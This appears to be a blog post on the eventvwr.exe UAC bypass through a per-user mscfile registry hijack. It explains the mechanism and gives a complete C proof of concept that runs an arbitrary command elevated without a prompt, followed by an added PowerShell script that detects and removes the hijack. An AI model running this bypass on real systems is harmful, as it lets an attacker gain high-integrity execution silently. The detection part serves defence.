UAC Bypass using eventvwr.exe

Yet another UAC bypass. Tested and working on Windows 7 with the default UAC level.

Original post: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

In short: when eventvwr.exe starts it resolves the handler for .msc files through the registry, and the per-user hive is one of the places it looks, because HKEY_CURRENT_USER\Software\Classes takes precedence over HKEY_LOCAL_MACHINE\Software\Classes when the mscfile class is resolved.

The key HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command does not exist by default, and the current user can create it without any special privilege. Put a command in its default value, launch eventvwr.exe, and that command runs in place of mmc.exe. Because eventvwr.exe is a Microsoft-signed auto-elevating binary, the default UAC level starts it as high-integrity without a prompt, so the command it spawns is elevated as well.

Two caveats: the account must already be a member of the local Administrators group (the bypass turns a medium-integrity admin token into a high-integrity one; it does not give admin rights to a standard user), and it does nothing at the "Always notify" UAC level, where auto-elevation is disabled. The key write is also the obvious detection point: nothing legitimate creates HKCU\Software\Classes\mscfile, so its appearance is a high-fidelity indicator.

The author's PoC is in PowerShell; I also put together an exe version. Code below.


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <Windows.h>

void help(void)
{
	printf("Use: xx.exe [cmd]\n");
}

int main(int argc, char *argv[])
{
	if (argc != 2)
	{
		help();
		return 0;
	}

	char *cmd = argv[1];
	if (strlen(cmd) > MAX_PATH)
	{
		printf("[-]: command too long!\n");
		return 0;
	}

	// Reg key: HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
	// This per-user key does not exist by default. eventvwr.exe consults it
	// before the HKLM handler, so whatever sits in its default value is run
	// (elevated) when the auto-elevating eventvwr.exe opens its .msc file.
	const char *regpath = "Software\\Classes\\mscfile\\shell\\open\\command";

	HKEY Kroot;
	DWORD dwdis;

	// Create the hijack key (opens it if it already exists). The explicit
	// "A" variants keep this building whether or not UNICODE is defined.
	if (RegCreateKeyExA(HKEY_CURRENT_USER, regpath, 0, NULL, 0, KEY_ALL_ACCESS, NULL, &Kroot, &dwdis) != ERROR_SUCCESS)
	{
		printf("open reg error!\n");
		return -1;
	}

	// Build "<system32>\cmd.exe /c <cmd>". The buffer has to hold the system
	// directory plus the user-supplied command, so it is larger than MAX_PATH;
	// otherwise sprintf_s would fail on long commands.
	char syspath[MAX_PATH];
	char command[2 * MAX_PATH + 16];
	memset(command, 0, sizeof(command));
	memset(syspath, 0, sizeof(syspath));
	GetSystemDirectoryA(syspath, MAX_PATH);
	sprintf_s(command, sizeof(command), "%s\\cmd.exe /c %s", syspath, cmd);

	// Set the default value. RegSetValueEx overwrites any existing value, so
	// there is no need to delete and recreate the key first. Write only the
	// string plus its terminator, not the whole buffer.
	if (RegSetValueExA(Kroot, NULL, 0, REG_SZ, (const BYTE *)command, (DWORD)(strlen(command) + 1)) != ERROR_SUCCESS)
	{
		printf("set reg error!\n");
		RegCloseKey(Kroot);
		RegDeleteKeyA(HKEY_CURRENT_USER, regpath);
		return -1;
	}
	RegCloseKey(Kroot);

	// Run it: eventvwr.exe auto-elevates, then opens eventvwr.msc through the
	// mscfile handler, which is now our command.
	system("eventvwr.exe");

	// Give eventvwr.exe a moment to resolve the handler and spawn the payload
	// before the key goes away.
	Sleep(3000);

	// Clean up. Note this removes only the leaf "command" key; the empty
	// mscfile\shell\open parents are left behind.
	RegDeleteKeyA(HKEY_CURRENT_USER, regpath);

	return 0;
}
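The flip side of the PoC above is the check you run afterwards, whether you are cleaning up after a test or hunting for this on a host. The following PowerShell is an added example, not code from the original post or from enigma0x3's PoC. It reads the per-user mscfile handler that eventvwr.exe consults, compares it with the machine-wide one, removes the per-user tree on request, and optionally searches Sysmon registry events for the write. The function names are this example's own, and the event search assumes Sysmon is installed with a RegistryEvent (Event ID 13) rule that covers this path.

```powershell
# Added example, not part of the original post: detect, inspect and remove
# the HKCU mscfile handler hijack used by the eventvwr.exe UAC bypass.
# Function names are this example's own. The Sysmon search assumes Sysmon
# with registry logging (Event ID 13) enabled for this key.

$HijackKey = 'HKCU:\Software\Classes\mscfile\shell\open\command'
$SystemKey = 'HKLM:\Software\Classes\mscfile\shell\open\command'

function Get-MscfileHandler {
    param([string]$Path)
    if (-not (Test-Path -Path $Path)) { return $null }
    # The (Default) value of a key is read with GetValue('') on the key item.
    return (Get-Item -Path $Path).GetValue('')
}

function Test-MscfileHijack {
    $user    = Get-MscfileHandler -Path $HijackKey
    $machine = Get-MscfileHandler -Path $SystemKey

    [PSCustomObject]@{
        # A clean system has no HKCU mscfile key at all, so any value is suspect.
        HijackPresent  = ($null -ne $user)
        UserCommand    = $user
        # Expected machine-wide handler: %SystemRoot%\system32\mmc.exe "%1" %*
        MachineCommand = $machine
        # mmc.exe is the only thing that should ever open an .msc file.
        Suspicious     = ($null -ne $user) -and ($user -notmatch 'mmc\.exe')
    }
}

function Remove-MscfileHijack {
    # Remove the whole per-user mscfile tree, not just the leaf "command" key,
    # because the PoC leaves the empty parent keys behind.
    $root = 'HKCU:\Software\Classes\mscfile'
    if (Test-Path -Path $root) {
        Remove-Item -Path $root -Recurse -Force
        return $true
    }
    return $false
}

function Find-MscfileHijackEvents {
    # Sysmon Event ID 13 (RegistryEvent: value set) records the write that the
    # PoC performs; the TargetObject in the message ends in
    # ...\mscfile\shell\open\command\(Default).
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13 }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'mscfile\\shell\\open\\command' } |
        Select-Object TimeCreated, Message
}

$result = Test-MscfileHijack
$result | Format-List
if ($result.Suspicious) {
    Write-Warning "Per-user mscfile handler points at: $($result.UserCommand)"
    # Uncomment to clean up the hijack:
    # Remove-MscfileHijack
}
```

Run it in a normal (non-elevated) PowerShell as the user who was targeted, since the key lives in that user's hive; the Sysmon log read needs an elevated session or membership in Event Log Readers.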

2 comments

  • Stopped by, leaving a mark.